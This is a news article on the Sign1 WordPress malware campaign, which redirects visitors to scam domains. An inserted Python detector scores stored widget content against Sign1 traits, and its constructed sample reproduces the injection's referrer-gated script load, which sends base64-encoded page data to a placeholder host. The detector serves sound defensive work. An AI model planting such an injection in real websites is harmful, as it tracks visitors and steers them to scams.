
39,000 Websites Infected in ‘Sign1’ Malware Campaign

Over 39,000 websites have been infected with the Sign1 malware that redirects visitors to scam domains.


More than 39,000 websites have been infected with a new malware family that redirects visitors to scam domains and displays unwanted ads, website security firm Sucuri warns.

Dubbed Sign1, the JavaScript malware was found inside WordPress custom HTML widgets or within the Simple Custom CSS and JS WordPress plugin that the attackers added to the compromised websites.

“Using this method, hackers infect websites without placing any malicious code into server files which allows the malware to stay unnoticed for a long time — as it’s much more common for security providers to scan website files for malware than to check in the database,” Sucuri says.

The injected code changes the URL it executes in the victim's browser every 10 minutes, which leads to unwanted redirects to VexTrio domains.

The malware, however, uses obfuscation to hide its presence and would only execute if the visitor comes from a major website, such as Facebook, Google, Instagram, or Yahoo.

“This is a common trait of malware as it tends to allow the infection to stay unnoticed for a longer time (normally a website owner will navigate to their website directly, rather than through a search engine),” Sucuri notes.

The security firm also discovered that the JavaScript code sets a specific cookie so that it would not detonate and display the unwanted pop-up multiple times for the same visitor.

Furthermore, execution is conditioned on the existence of a JavaScript file named with a hexadecimal string that matches the current 10-minute interval.


“If these conditions are met, then the malware is injected and executes yet another script passing the URL of the current page, the referrer, and the browser language as a base64-encoded parameter. This script works as a TDS and redirects users further to malicious sites (usually the VexTrio scam sites),” Sucuri says.
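Because the injection lives in database-stored widget and plugin content rather than in server files, a defender can export those entries and score each one against the traits described above (referrer gate for major sites, one-shot cookie, 10-minute time bucket, base64-encoded parameters, dynamic script loading). The following is an added example, not Sucuri's tooling; the sample entries are constructed, the `example.invalid` host is a placeholder, and the storage locations named in the comments are assumptions about WordPress, not details from the article.

```python
import re
from typing import NamedTuple

class Finding(NamedTuple):
    indicator: str
    evidence: str

# Heuristics derived from the behaviour the article describes. Each one on its
# own is common in legitimate custom JS; the signal is their co-occurrence.
INDICATORS = {
    "referrer_gate": re.compile(r"document\.referrer", re.I),
    "major_site_list": re.compile(r"facebook|google|instagram|yahoo", re.I),
    "cookie_write": re.compile(r"document\.cookie\s*=", re.I),
    "ten_minute_bucket": re.compile(r"600000|600\s*\*\s*1000"),
    "base64": re.compile(r"\b(atob|btoa)\s*\(", re.I),
    "dynamic_script_load": re.compile(r"createElement\s*\(\s*['\"]script['\"]\s*\)", re.I),
    "hex_string_literal": re.compile(r"['\"][0-9a-f]{32,}['\"]", re.I),
}

def score_snippet(content: str) -> list[Finding]:
    """Return every indicator matched in one stored widget or plugin entry."""
    findings = []
    for name, rx in INDICATORS.items():
        m = rx.search(content)
        if m:
            findings.append(Finding(name, m.group(0)))
    return findings

def is_suspicious(content: str, threshold: int = 3) -> bool:
    """Flag an entry only when several independent traits co-occur."""
    return len(score_snippet(content)) >= threshold

# Constructed sample entries (not real infection content). Assumed sources:
# the Custom HTML widget body in wp_options (option 'widget_custom_html') and
# Simple Custom CSS and JS entries in wp_posts, exported as plain strings.
BENIGN_WIDGET = """<script>
  document.cookie = "cookie_notice=1; path=/";
  document.getElementById("banner").style.display = "none";
</script>"""

SUSPICIOUS_WIDGET = """<script>
  if (/google|facebook|instagram|yahoo/i.test(document.referrer) && document.cookie.indexOf("v=") < 0) {
    document.cookie = "v=1; path=/";
    var b = Math.floor(Date.now() / 600000).toString(16);
    var s = document.createElement("script");
    s.src = "https://example.invalid/" + b + ".js?d=" + btoa(location.href + "|" + document.referrer + "|" + navigator.language);
  }
</script>"""

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_WIDGET), ("suspicious", SUSPICIOUS_WIDGET)):
        print(label, is_suspicious(body), [f.indicator for f in score_snippet(body)])
```

Tune the threshold against a site's own legitimate custom JS before acting on hits, and review flagged entries by hand rather than deleting them automatically.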

Over the past six months, the security firm identified over 39,000 sites infected with different variants of the malware, with the most recent of them infecting more than 2,500 sites in the past two months.

Sucuri identified 15 domains used in this malicious campaign. Eight of them have been used in thousands of infections each.


Copyright © 2024 SecurityWeek ®, a Wired Business Media Publication. All Rights Reserved.
